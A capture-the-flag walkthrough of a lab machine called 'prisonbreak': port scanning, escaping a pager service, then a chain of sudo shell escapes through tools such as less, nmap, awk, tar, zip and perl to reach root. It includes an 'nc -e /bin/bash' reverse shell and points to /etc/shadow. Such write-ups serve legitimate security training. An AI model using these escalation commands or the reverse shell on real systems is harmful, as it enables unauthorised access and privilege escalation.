prisonbreak

### By b13ss3d ###

There's also a video version, if you want to check it out: prisonbreak

Port Scanning

First we perform a port scan using Rustscan to identify open ports.

rustscan -a 10.0.200.47
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

Open 10.0.200.47:22
Open 10.0.200.47:1337

Once we know what ports are open, we use nmap to obtain the services and their versions running on these ports.

❯ nmap -p22,1337 -sCV -n -Pn -v 10.0.200.47 -oN scan
<SNIP>
Nmap scan report for 10.0.200.47
Host is up (0.15s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 39:d8:72:f0:6f:74:58:78:ea:2b:e4:06:b9:82:67:65 (RSA)
|   256 55:8b:25:46:3d:72:08:35:46:23:4f:4c:fa:70:ba:a7 (ECDSA)
|_  256 10:ce:b4:58:a2:c3:59:5b:0f:e7:91:e3:6a:04:fb:4e (ED25519)
1337/tcp open  waste?
| fingerprint-strings: 
|   GenericLines, NULL: 
|     [?1049h
|     [?1h
|     MORE(1) User Commands MORE(1)
<SNIP>

• -p <ports>

• -sCV combines the options -sC and -sV.

• nmap help:

• -sC: equivalent to --script=default

• -sV: Probe open ports to determine service/version info

• -n: Never do DNS resolution

• -vvv: Increase verbosity level

• -oN <file>: Output scan in normal format.

Port 22 is running SSH, but Nmap cannot determine the service on port 1337, so we'll need to identify it manually.

Gaining access

Using Netcat to connect to port 1337, we receive the manual for the "more" command. We can escape from this environment by pressing Esc and then typing :!bash. After pressing Enter, we obtain a shell.

Upgrading shell

To upgrade the shell, we execute the following command: script /dev/null -qc bash

Next, press Ctrl+Z and then run: stty raw -echo; fg

Finally, reset the terminal: reset xterm

With the shell back, execute: export TERM=xterm

And adjust the terminal size with: stty rows 44 cols 172

Horizontal privilege escalation

cell2 user

With the shell as the "cell1" user, execute: sudo -l

• sudo -l, --list list user's privileges.

You see that we can execute more as the "cell2" user. Elevate privileges by running: sudo -u cell2 more /etc/passwd (or any other existent file). Press Esc followed by :!bash, just as before, to become the "cell2" user.

Having done this we are "cell2" user.

cell3 user

Run sudo -l again, and you'll see that you can execute less as the "cell3" user.

Searching on Google, we found this resource that explains how to escape from less using sudo. Follow this process: sudo -u cell3 /usr/bin/less /etc/passwd Escape pressing escape then write :!bash to switch to the "cell3" user.

cell4 user

As the "cell3" user, run sudo -l:

Note that you can execute nmap as the "cell4" user. Searching for ways to escalate privileges with nmap, we found this method on GTFObins to execute commands:

First we have to be in a world readable directory like /tmp, here execute the following commands: echo 'os.execute("/bin/bash")' > test sudo -u cell4 /usr/bin/nmap --script test You now have access as "cell4".

cell5 user

As "cell4", run: sudo -l

To escalate to "cell5", we found this GTFObins resource. Execute: sudo -u cell5 /usr/bin/awk 'BEGIN {system("/bin/bash")}'

This way now we are cell5.

cell6 user

For "cell6", execute sudo -l:

To gain access as "cell6", you can use the method outlined here: sudo -u cell6 /usr/bin/find . -exec /bin/bash \; -quit

After executing this command we are cell6.

cell7 user

Run sudo -l as "cell6":

This user can use sudo to execute vim as cell7, use this method found on GTFObins. sudo -u cell7 /usr/bin/vim -c ':!/bin/bash'

And you'll be cell7.

cell8 user

For "cell8", execute sudo -l:

So execute: sudo -u cell8 /usr/bin/links /etc/passwd then press Esc twice, hit Enter, select the option to spawn an OS shell.

And you are now cell8.

cell9 user

Being "cell8" execute sudo -l:

This user can execute /usr/bin/lynx as "cell9". Following the steps from this resource, execute: sudo -u cell9 /usr/bin/lynx /etc/passwd, then enter the options with o.

Change the Editor to /usr/bin/vim.

Accept the changes.

Finally press "e" to enter the editor, and escape from Vim by pressing Esc followed by :!bash.

cell10 user

Execute sudo -l:

cell9 can execute /usr/bin/zip as cell10.

To escalate privileges use this method was found on GTFObins. sudo -u cell10 /usr/bin/zip /tmp/test /etc/hosts -T -TT 'bash #'

cell11 user

As "cell10", run: sudo -l

cell10 can execute /bin/tar as cell11. There's this method to execute commands on GTFObins. sudo -u cell11 /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

cell12 user

Execute sudo -l:

cell11can execute /usr/bin/mutt as cell12, so execute: sudo -u cell12 /usr/bin/mutt To escape, press Esc followed by !.

Here enter bash to get a shell, as explained in this resource.

cell13 user

As "cell12", execute sudo -l:

To escalate to cell13 execute: sudo -u cell13 /usr/bin/pinfo Press ! to open a shell prompt within pinfo.

Set up a listener on another tab: nc -nlvp 443 In the pinfo shell prompt, create a reverse shell: nc -e /bin/bash <ip> 443

Replace <ip> with your actual IP address. In your listener terminal, you should receive a connection.

Upgrade the shell: script /dev/null -qc bash then press Ctrl+z and immediatelly execute the command: stty raw -echo;fg

Finally execute reset xterm

You are now cell13.

root user

As cell13, execute sudo -l:

cell13 can execute /usr/bin/perl as root. This method on GTFObinsshows us how to execute commands: sudo /usr/bin/perl -e 'exec "/bin/bash";'

Congratulations! You now have root access.

The flags can be found in:

• /root

• /etc/shadow

• /proc/1/environ

• The home directory of every "cell" user.